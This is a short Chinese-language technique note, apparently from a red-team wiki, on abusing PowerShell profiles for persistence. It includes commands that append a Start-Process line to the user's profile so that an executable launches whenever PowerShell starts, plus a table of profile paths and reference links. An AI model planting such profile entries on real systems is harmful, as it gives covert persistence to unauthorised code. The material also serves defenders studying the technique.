# 滥用POWERSHELL配置文件

PowerShell启动时会执行配置文件的内容。

Powershell：

```
echo $profile
Test-Path $profile
New-Item -Path $profile -Type File –Force
$string = 'Start-Process "C:\Temp\qwqdanchun.exe"'
$string | Out-File -FilePath "%HOMEPATH%\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
```

注：Powershell默认配置文件有多个，按照从上到下的顺序优先级从高到低

| Description                | Path                                                              |
| -------------------------- | ----------------------------------------------------------------- |
| All Users, All Hosts       | $PSHOME\Profile.ps1                                               |
| All Users, Current Host    | $PSHOME\Microsoft.PowerShell\_profile.ps1                         |
| Current User, All Hosts    | $Home\[My ]Documents\PowerShell\Profile.ps1                       |
| Current user, Current Host | $Home\[My ]Documents\PowerShell\Microsoft.PowerShell\_profile.ps1 |

参考文章：

{% embed url="<https://github.com/enigma0x3/PowershellProfile>" %}

{% embed url="<https://enigma0x3.net/2014/06/16/abusing-powershell-profiles/>" %}

{% embed url="<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.1&viewFallbackFrom=powershell-6>" %}